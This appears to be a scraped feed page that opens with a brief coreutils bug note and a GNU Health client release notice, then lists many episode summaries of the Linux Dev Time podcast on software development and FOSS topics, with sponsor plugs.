The test suite may have failed with a "Hangup" error if run non-interactively.
[issue introduced in coreutils-9.10]
Dear community
The GTK client 5.0.2 of the GNU Health Hospital and Health Management system has been released!
This is a maintenance patchset that fixes the following issues:
You can get the latest GNU Health client from GNU.org, Python Package Index or Codeberg.
Happy hacking!
We get into dependency management. The pros and cons of tools like Dependabot, the varying approaches with different languages and standard library sizes, the times when pinning dependencies makes sense, and more.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
In the wake of Discord’s recent announcement about age verification, Matrix recently came in for a lot of criticism by a lot of people who said it’s not a viable replacement. Andy works on Matrix for a living and Amolith is invested in the XMPP world so we get into secure messaging, trade-offs between security and user experience, federation, and more.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
The importance of having and sticking to correct development processes, what can go wrong when you don’t, and how to fix the problems you might end up with.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
People often like to talk down Electron, but it is really that bad? There may be better ways to use Web technologies to make desktop apps, but isn’t having Linux versions of apps a good thing no matter how they are made?
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
The career progression options you have as a software engineer, moving from junior to senior dev, other paths you can go down like architecture or tech lead, and why management isn’t for everyone.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
Software complexity is a complex topic, so we dig into it.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
Dealing with a crisis as a developer, how to keep everyone in the loop while you fix systems and code, why pointing the blame isn’t useful, some of our horror stories, and more.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
What we are likely to be doing when you hear this, and why it’s unlikely to involve much in the way of development. This is a short episode because Joe is having a break for the Christmas period.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
How far you can go with eliminating global variables, forcing everything you ever need to be passed in as arguments.
Tailscale
Tailscale is an easy to deploy, zero-config, no-fuss VPN that allows you to build simple networks across complex infrastructure. Go to tailscale.com/ldt and try Tailscale out for free for up to 100 devices and 3 users, with no credit card required. Use code LATENIGHTLINUX for three free months of any Tailscale paid plan.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
When the right time to make a big change to your software is, how you get users to test pre-release versions, how long you keep old features around, when that’s not possible, and more.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
What object-oriented programming is, why it went out of fashion, and how more modern approaches to development incorporate some of its aspects.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
Some of the languages that we love and why we love them. It’s not just Rust, honest!
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
With constant news stories about security issues with developer-published software in package managers like npm, we weigh up the pros and cons of this approach to distributing open source software.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
What makes a good commit, the tools we use to help us produce good commits, and why we care about this.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
Some of the alternatives to GitHub that we use, why we use them, and how they differ in terms of features and workflows.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
A lot of key open source software is paid for by large companies. That has some advantages, but it can also cause some issues. Maybe it would be better if more FOSS development was paid for by smaller companies and contributions from users.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
We explore the differences between terms like coder, software developer, engineer, and architect. They are often used interchangeably, but there can be real differences between them. Or at least once upon a time there were differences.
Vibe coders are in for a shock. Writing code was never that hard.
Don’t Let Architecture Astronauts Scare You
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
Not invented here syndrome is very common in open source. We get into why that is, when it makes sense to start your own project from scratch, and how contributing to existing software can sometimes be better for everyone.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
With the recent news of Bcachefs (probably) being removed from the Linux kernel, we are joined by Allan Jude from 2.5 Admins and Klara to discuss some of what we think went wrong, how to manage and maintain multiple releases of a project at once, and why release engineering is an important concept.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
What it takes to sustain a medium-to-large-sized open source project.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
When and how to use benchmarking in your project, why it’s hard, and why optimising your code can be even harder.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
How we deal with complex projects involving non-technical people as well as developers. How to manage expectations about timing, how to deal with issues, why documenting conversations is important, and more.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
What are the fundamental ideas and components of development and programming?
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
It’s another hot questions episode. Tabs vs spaces, whether we have imposter syndrome, why software keeps getting heavier, the correct length of functions and files, and what every programmer should know.
Some things we mentioned:
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
Andy is convinced that functional programming isn’t boring. Listen to find out if he’s right!
Functional Programming & Haskell
Functional Programming & Haskell – Computerphile
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
We’ve done hot takes episodes in the past but this is different, it’s hot questions. Would we rather have bad managers who can code or good managers who can’t? Too many comments or none? 80 columns or as long as you like? What editor do we use and why?
Vim for Fun or PeerTube version
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
Joe accidentally tried vibe coding and it was as much of a disaster as you’d imagine. Amolith has also tried it, and does his best to defend the use of LLMs with development. Kevin and Andy are mostly bemused. We all have concerns about the ethics and environmental issues.
This episode has a bit more bad language than usual.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
Our advice on how to move into a career in software development including making and contributing to projects, advocating for your work, collaborating, avoiding exploitation, learning Git, and loads more.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
Andy is only publishing his games on F-Droid and not the Google Play Store from now on, and he tells us why.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
We dig into the technical details of the Linux Kernel Rust drama.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
Mark from Linux Matters who’s a web developer joins us to talk about working in PHP – a language that’s mature and well established, and how that compares with working with newer “cooler” languages like Rust and Go.
Bash associative array examples
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
Where is the balance between efficiency and openness when it comes to saved file formats? If everything was based on plain text it would make the files readable for years to come, but at what cost?
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
We dig into SQLite – an interesting and unusual project that is widely used but has an uncommon licence, a proprietary test suite, and doesn’t take external contributions. Plus printf() vs “proper” debugging.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
We explore the line between developer and sysadmin and come to the conclusion that despite the clear difference between the roles, there is a lot of crossover when it comes to skills and character traits.
The Six Dumbest Ideas in Computer Security
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
We are joined by popey from Linux Matters to talk about how software packaging has changed over the years. The tooling has improved massively, containerisation has made a huge impact, but Andy still prefers the old distro repo model.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
More of our development hot takes including excessive energy use, optimising your code, the importance of licences, Matrix and Jabber being on the same side, the myth of secure code, and why self-hosting is hard.
1Password
Extended Access Management: Secure every sign-in for every app on every device. Support the show and check it out at 1password.com/linuxdevtime
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
Some of the work-adjacent things that we do including writing code that we shouldn’t like writing Rust in Rust, fun projects that turned into paid work, and career progression. Plus some of our go to resources for learning about development.
Some resources we mentioned
Self-Directed Research Podcast
1Password
Extended Access Management: Secure every sign-in for every app on every device. Support the show and check it out at 1password.com/linuxdevtime
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
Our development hot takes including “rewrite it in Rust”, lack of documentation, single vs multiple monitors, dependency numbers, light vs dark mode, and distro package repos.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
You need to be able to write good code to be a successful developer, but how important are other “soft” skills like communication, relating to and motivating others, and time management?
Kevin mentioned a blog post about burnout in the Rust project
1Password
Extended Access Management: Secure every sign-in for every app on every device. Support the show and check it out at 1password.com/linuxdevtime
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
Campbell Barton joins us to talk about porting Blender, the hugely popular professional 3D software, to Wayland.
Wayland support in blender task
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
What is it about Linux that draws us to it as a development platform? Plus why we choose the specific distros that we use.
1Password
Extended Access Management: Secure every sign-in for every app on every device. Support the show and check it out at 1password.com/linuxdevtime
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
Following on from our episode about dealing with a horrible codebase, Andy argues that completely rewriting a project is almost always a bad idea.
Things You Should Never Do, Part I
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
Kevin and Andy talk about their project extremes: the oldest and newest projects they’ve worked on, the biggest and smallest codebases, the ugliest hack, the most elegant, the most popular, the most trivial, and the most important.
Andy’s links
Announcing I-DUNNO 1.0 and web-i-dunno
Kevin’s links
1Password
Extended Access Management: Secure every sign-in for every app on every device. Support the show and check it out at 1password.com/linuxdevtime
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
How to deal with a horrible codebase that you’ve inherited. Getting started, breaking the problem into smaller pieces, understanding what’s actually wrong, the importance of testing (as usual), and why technical debt isn’t necessarily the best name for the problem.
Working Effectively with Legacy Code
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
Developing as part of an in-person team vs working remotely, synchronous vs asynchronous development, how to make a hybrid team work effectively, and how code review fits into it all.
1Password
Extended Access Management: Secure every sign-in for every app on every device. Support the show and check it out at 1password.com/linuxdevtime
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
What agile software development is exactly, why planning and being willing to adapt the plan are key, the pros and cons of all the process that’s involved, the role that scrum plays, and why it’s all about communication.
Study finds 268% higher failure rates for Agile software projects
Amolith will be at Fossy in August.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
Andy is annoyed that so much free and open source software is hosted on a proprietary platform that’s owned by Microsoft. There are plenty of alternatives to GitHub, but ultimately the network effect is why so many people host their code there. We dream of a proper federated solution. Maybe one day…
1Password
Extended Access Management: Secure every sign-in for every app on every device. Support the show and check it out at 1password.com/linuxdevtime
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
If you want to be a good developer, how many different programming languages should you learn? Maybe becoming an expert in one specific language is the way to go. Maybe it’s more a case of learning different concepts and paradigms than languages.
1Password
Extended Access Management: Secure every sign-in for every app on every device. Support the show and check it out at 1password.com/linuxdevtime
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
Forks are a fundamental aspect of open source software so we get into the different types of forks, when and why you might want to fork a project, the maintenance burden that comes with a hard fork, the importance of winning mindshare for your fork, what exactly counts as a fork, when it’s not always a great idea to fork, and more.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
We are joined by Allan Jude to talk about what it’s like to run a company that develops and maintains open source software with a focus on upstreaming as much code as possible.
November 2023 FreeBSD Vendor Summit – The Value of Upstream First
How to upstream code to open source projects
FiloSottile (Filippo Valsorda)
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
Andy is a huge proponent of test-driven development and explains why – including types of code testing including unit tests and integration tests, when you actually need to run tests, how long they should take, and more.
Kolide
Kolide ensures that if a device isn’t secure it can’t access your apps. It’s Device Trust for Okta. Visit kolide.com/linuxdevtime to learn more.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
Kevin and Andy answer Joe’s noob questions about development including the differences between compiled and interpreted languages, C vs C++, why the Linux kernel is written in C, Go vs Rust, and what memory safety means.
Kolide
Kolide ensures that if a device isn’t secure it can’t access your apps. It’s Device Trust for Okta. Visit kolide.com/linuxdevtime to learn more.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
We are joined by Drew DeVault to discuss his programming language called Hare, which aims for 100 years of forwards compatibility.
We mentioned Drew’s blog posts Can I be on your podcast? and It takes a village
Kolide
Kolide ensures that if a device isn’t secure it can’t access your apps. It’s Device Trust for Okta. Visit kolide.com/linuxdevtime to learn more.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
How we first learned to code, and how we learn new technologies now.
Snake in Terraform
Snake in lots of languages
Web server in Sinclair BASIC
Kolide
Kolide ensures that if a device isn’t secure it can’t access your apps. It’s Device Trust for Okta. Visit kolide.com/linuxdevtime to learn more.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
What we’ve learned over the years about the interview process for software development jobs, both as the applicant and the interviewer.
Kolide
Kolide ensures that if a device isn’t secure it can’t access your apps. It’s Device Trust for Okta. Visit kolide.com/linuxdevtime to learn more.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
The automation tools we use in our development and why we use them. Plus how to engage with your project’s community – both in real time, and asynchronously.
Kolide
Kolide ensures that if a device isn’t secure it can’t access your apps. It’s Device Trust for Okta. Visit kolide.com/linuxdevtime to learn more.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
Andy Balaam joins us to talk about accepting contributions from devs with varying levels of experience. When to invest the time to mentor them, why documentation is important, how automated tools fit in, being willing to decline some contributions, dealing with companies vs individuals, and more.
Kolide
Kolide ensures that if a device isn’t secure it can’t access your apps. It’s Device Trust for Okta. Visit kolide.com/linuxdevtime to learn more.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
How we use AI coding assistants like GitHub Copilot, what they have done to the development industry, what might happen in the future, and the ethics of the whole thing. With guest host Linus.
Kolide
Kolide ensures that if a device isn’t secure it can’t access your apps. It’s Device Trust for Okta. Visit kolide.com/linuxdevtime to learn more.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
We follow up on last episode with some clarifications from Amolith about code collaboration. Plus we get into development workflows in general, code review, the paradigms we couldn’t do without, and more. With guest host Linus.
Amolith mentioned a Low energy game jam.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
When it comes to collaboration workflows, Amolith dislikes the pull request model that GitHub made popular and much prefers the email/patch-based approach. Kevin does his best to get to the bottom of why, and Joe wonders if it might come down to disliking Microsoft.
Your GitHub pull request workflow is slowing everyone down
See our contact page for ways to get in touch.
Subscribe to the RSS feed
Linux Downtime is now Linux Dev Time!
In this first episode we talk about “sharpening our tools” – changing your dev tools, trying out new languages, using existing code vs writing something new, how to get over creative blocks, and more.
How Often Should We Sharpen Our Tools?
See our contact page for ways to get in touch.
Subscribe to the RSS feed
Kevin joins us to talk about the hype that surrounds some programming languages like Rust and Python, how some languages like Java went out of fashion, and why the likes of PHP never saw much hype at all. With guest host Jim from 2.5 Admins.
Factor
Factor’s fresh, never frozen, meals are ready in just 2 minutes, so all you have to do is heat them up and enjoy. Go to factormeals.com/ldt50 and use code ldt50 to get 50% off.
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
There’s a meme that software developers should be forced to use low end hardware to experience what it’s like to be a real user. So what hardware should devs actually use to test their software? How does this differ for GUI and CLI applications? With guest host Jim from 2.5 Admins.
HelloFresh
With HelloFresh, you get farm-fresh, pre-portioned ingredients and seasonal recipes delivered right to your doorstep. Get free breakfast for life at hellofresh.com/ldtfree using code ldtfree. (One breakfast item per box while subscription is active).
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
We are joined by Roger Light to discuss what it’s like to work for a company that uses the open core model — maintaining an open source project and offering additional paid for proprietary features. With guest host Jim from 2.5 Admins.
Factor
Factor’s fresh, never frozen, meals are ready in just 2 minutes, so all you have to do is heat them up and enjoy. Go to factormeals.com/ldt50 and use code ldt50 to get 50% off.
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
We are joined by Marcin Kulik – the creator and maintainer of asciinema. We talk about the project itself, developing on Linux, IDEs, targetting a technical audience, the advantages of writing for a command line interface, why -R is always wrong for the recursive flag, and more. With guest host Jim from 2.5 Admins.
HelloFresh
With HelloFresh, you get farm-fresh, pre-portioned ingredients and seasonal recipes delivered right to your doorstep. Get 50% off plus free shipping at hellofresh.com/50ldt using code 50ldt.
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
Jim Salter joins us to talk about getting the most out of your open source project. From designing and planning, to attracting contributors, considering the correct scope, building on top of existing software, and more.
Factor
Factor’s fresh, never frozen, meals are ready in just 2 minutes, so all you have to do is heat them up and enjoy. Go to factormeals.com/ldt50 and use code ldt50 to get 50% off.
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
How to get hired for your first development job, more on contributor license agreements, and our thoughts on different immutable OS approaches.
Fiduciary Licence Agreement (FLA) – FSFE
Why the FSF Gets Copyright Assignments from Contributors
HelloFresh
With HelloFresh, you get farm-fresh, pre-portioned ingredients and seasonal recipes delivered right to your doorstep. Get 50% off plus 15% off the next 2
months at hellofresh.com/50ldt using code 50ldt.
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
We are joined by Element developer Andy Balaam to talk about working on open source software after 20 years in the proprietary world. We get into working in public, the realities of accepting code contributions, being part of a distributed team, the pros and cons of working from home, and more.
Andy’s links:
Factor
Factor’s fresh, never frozen, meals are ready in just 2 minutes, so all you have to do is heat them up and enjoy. Go to factormeals.com/ldt50 and use code ldt50 to get 50% off.
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
We are all on board with the right to be forgotten but it can cause some tricky problems for open source projects – particularly small ones. Plus why we won’t stop going on about why we take such a dim view of crypto.
Amolith mentioned a toot from the Tor Project.
HelloFresh
With HelloFresh, you get farm-fresh, pre-portioned ingredients and seasonal recipes delivered right to your doorstep. Get 50% off and free shipping at hellofresh.com/50ldt using the promo code 50ldt.
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
Why Amolith uses Arch, why Gary uses Debian, and why Joe uses Ubuntu.
Factor
Factor’s fresh, never frozen, meals are ready in just 2 minutes, so all you have to do is heat them up and enjoy. Go to factormeals.com/ldt50 and use code ldt50 to get 50% off.
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
Contributor license agreements aren’t very popular, but not having a CLA can cause problems for projects in the future. Gary can’t do things like publishing Pidgin on Apple’s app stores, and Amolith is wrestling with how to keep his options open for the SaaS project he’s working on.
Factor
Factor’s fresh, never frozen, meals are ready in just 2 minutes, so all you have to do is heat them up and enjoy. Go to factormeals.com/ldt50 and use code ldt50 to get 50% off.
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
We are joined by Chris Waldon to talk about how to get started with coding and software development.
Chris mentioned his blog.
Factor
Factor’s fresh, never frozen, meals are ready in just 2 minutes, so all you have to do is heat them up and enjoy. Go to factormeals.com/ldt50 and use code ldt50 to get 50% off.
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
Is there really a renaissance in open communication tools? Does the success of the Fediverse mean that people are finally moving away from the huge companies that lock your data up? Are FOSS people just living in a bubble while the world continues to use the big platforms? How does Meta/Facebook joining the Fediverse fit into the picture? What about Bluesky?
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
Jorge tries to address Félim‘s concerns about immutable desktop distros like Silverblue and Universal Blue.
Factor
Factor’s fresh, never frozen, meals are ready in just 2 minutes, so all you have to do is heat them up and enjoy. Go to factormeals.com/ldt50 and use code ldt50 to get 50% off your first box.
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
Amolith attempts to argue that avoiding ads using open source software is piracy, and that piracy in this case is good.
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
Part 2 of our chat with Molly White from Web3 is Going Just Great. This time we talk about Mastodon and the Fediverse, central bank digital currencies, cashless societies, the hype around AI, corporate surveillance, and more.
ServerMania
ServerMania offers a wide range of fully customizable dedicated, cloud, colocation, and IP Transit services, and free initial consultations. Go to servermania.com/ldt and use the promo code linuxdowntime to get 15% off dedicated servers – recurring for life.
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
We are joined by Molly White from Web3 is Going Just Great to talk about the issues with crypto, Bitcoin, the Lightning network, blockchain, NFTs, and “web3”.
Amolith will be at SELF June 9-11 in Charlotte NC.
ServerMania
ServerMania offers a wide range of fully customizable dedicated, cloud, colocation, and IP Transit services, and free initial consultations. Go to servermania.com/ldt and use the promo code linuxdowntime to get 15% off dedicated servers – recurring for life.
Liam from Gaming on Linux joins us to talk about the current state of Linux gaming, the Steam Deck, how things progressed to this point, Valve being the driving force behind it all, whether the lack of native Linux games matters when Proton exists, and loads more.
Gaming on Linux YouTube channel
Check out Linux Matters
ServerMania
ServerMania offers a wide range of fully customizable dedicated, cloud, colocation, and IP Transit services, and free initial consultations. Go to servermania.com/ldt and use the promo code linuxdowntime to get 15% off dedicated servers – recurring for life.
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
We are joined by Amolith from Linux Lads and Alan Pope to discuss Generation Z’s view of technology, and whether modern abstraction layers ultimately detract from ideas of software freedom and digital rights.
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
We are joined by Alex from Self-Hosted to talk about home media setups. Is it a good idea to use a NAS running a desktop while connected to a TV, or does something like an Nvidia Shield make more sense?
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
What is the right level of customisation for the Linux desktop?
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
Should open source projects use open platforms for their communities, or should they meet people where they are – places like Discord?
Join the Discord server, Telegram group, Matrix room, or IRC channel.
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
Martin tells us about why he decided to work with Nix and NixOS professionally.
He mentioned Determinate Systems and Zero to Nix
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
In the modern world where we run more and more software from outside our distros’ repositories, how do we know what to trust?
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
Martin, Gary, and Hayden explain how their regular live streams benefit the open source projects that they work on.
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
Modding a Game Cube with a Raspberry Pi Pico, writing a book about cross-platform and cross-architecture development, and the struggles of self-hosted security camera footage.
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
Alan Pope (popey) joins us to discuss building and fostering a positive and productive community.
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
Martin has created a new desktop environment and a container tool, Gary has been clustering Raspberry Pis, and Hayden has been playing with the new Microsoft Arm box.
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
Simon Butcher joins us to talk about how open source AI can be, in theory and in practice.
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
What problems that we are currently facing will be solved with Linux and FOSS in the future, and why does it involve AI/ML?
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
Does it matter where you host your FOSS code? GitHub benefits from the network effect, but other options have their own benefits. Plus Gary explains why he doesn’t use Git.
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
What’s the best way to implement telemetry and metrics in open source software, and should it be opt-in or opt-out?
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
What F/OSS means to us and why it’s important.
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
It’s part 2 of our discussion about sustainability in FOSS.
Make sure to listen to part 1 first.
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
There is a sustainability problem in FOSS. How do we fix it?
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
Hayden explains why he uses Windows Subsystem for Linux on a daily basis, and argues that Microsoft is a very different organisation from the one that was so hostile to FOSS 20+ years ago.
He mentioned his unofficial timeline of Microsoft’s transition towards open source.
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
Martin and Hayden explain what it’s actually like to use GitHub Copilot, and why they think it’s going to have a positive impact open source software. Plus Hayden explains the legal nuances.
See our contact page for ways to get in touch.
See the RSS Feeds page for ways to subscribe to the show.
Stuart Langridge joins us to discuss the nuances of gatekeeping in the Linux community, and why he thinks we inadvertently engaged in it on the last episode.
See our contact page for ways to get in touch.
See the RSS Feeds page for ways to subscribe to the show.
Kyle joins us again, along with Hayden Barnes to answer the question: what exactly is a Linux distribution these days? The rise of immutable filesystems, containerisation, virtualisation, hypervisors, and abstraction layers makes this more complex than it might appear.
Vultr
High-performance cloud compute, bare metal, and storage in 25 locations all over the world. Go to getvultr.com/ldt to sign up and get $150 free credit to use in 30 days.
Kolide
Endpoint Security for Teams That Slack – Try for Free Today! https://l.kolide.co/3iIyKov
See our contact page for ways to get in touch.
See the RSS Feeds page for ways to subscribe to the show.
Martin and Joe are joined by Kyle Fazzari to reimagine the Linux desktop. What we’d do differently if we were starting over today, who we’d aim it at, what packaging system we’d use, what interface, and more.
Vultr
High-performance cloud compute, bare metal, and storage in 25 locations all over the world. Go to getvultr.com/ldt to sign up and get $150 free credit to use in 30 days.
Kolide
Endpoint Security for Teams That Slack – Try for Free Today! https://l.kolide.co/3iIyKov
See our contact page for ways to get in touch.
See the RSS Feeds page for ways to subscribe to the show.
How do you progress your career as a FOSS enthusiast?
Vultr
High-performance cloud compute, bare metal, and storage in 25 locations all over the world. Go to getvultr.com/ldt to sign up and get $150 free credit to use in 30 days.
Kolide
Endpoint Security for Teams That Slack – Try for Free Today! https://l.kolide.co/3iIyKov
See our contact page for ways to get in touch.
See the RSS Feeds page for ways to subscribe to the show.
Adam tries to sell Fedora to Joe and Martin, two Ubuntu (flavour) users.
Vultr
High-performance cloud compute, bare metal, and storage in 25 locations all over the world. Go to getvultr.com/ldt to sign up and get $150 free credit to use in 30 days.
Kolide
Endpoint Security for Teams That Slack – Try for Free Today! https://l.kolide.co/3iIyKov
See our contact page for ways to get in touch.
See the RSS Feeds page for ways to subscribe to the show.
Joe and Adam are joined by Martin Wimpress to talk about what goes into running a distro like Ubuntu Mate. Governance and finances, the benefits of being an official Ubuntu flavour, hardware enablement, and more.
Vultr
High-performance cloud compute, bare metal, storage, and managed Kubernetes in 24 locations all over the world. Go to getvultr.com/ldt to sign up and get $150 free credit to use in 30 days.
Kolide
Endpoint Security for Teams That Slack – Try for Free Today! https://l.kolide.co/3iIyKov
See our contact page for ways to get in touch.
Joe is joined by Alex Kretzschmar from the Self-Hosted podcast to talk about what and why Alex self-hosts, the hardware and software he uses, and how his approaches have changed over the years.
Alex mentioned his Twitter, his blog, a specific blog post about transcoding video, and Serverbuilds.net.
Vultr
High-performance cloud compute, bare metal, storage, and managed Kubernetes in 24 locations all over the world. Go to getvultr.com/ldt to sign up and get $150 free credit to use in 30 days.
See our contact page for ways to get in touch.
See the RSS Feeds page for ways to subscribe to the show.
Joe and Gary from Linux After Dark talk about installing and running the first alpha of Asahi Linux on an M1 Mac Mini and Macbook Air, as both a desktop and a headless server.
See our contact page for ways to get in touch.
See the RSS Feeds page for ways to subscribe to the show.
Joe is joined by Stuart Langridge to talk about Open Web Advocacy, a group of software engineers from all over the world who have come together to advocate for the future of the open web.
Stuart’s consulting company Kryogenix
See our contact page for ways to get in touch.
See the RSS Feeds page for ways to subscribe to the show.
Joe is joined by Adam Pigg, a member of the Sailfish OS Community who has ported the OS to various phones.
A thread with some of Adam’s history
See our contact page for ways to get in touch.
See the RSS Feeds page for ways to subscribe to the show.
Joe is joined by Joey Sneddon from OMG! Ubuntu! to talk about how Ubuntu and its community have changed over the years, snaps, GNOME, Flutter, WSL, and more.
You can follow OMG! on Twitter, Instagram and YouTube.
See our contact page for ways to get in touch.
See the RSS Feeds page for ways to subscribe to the show.
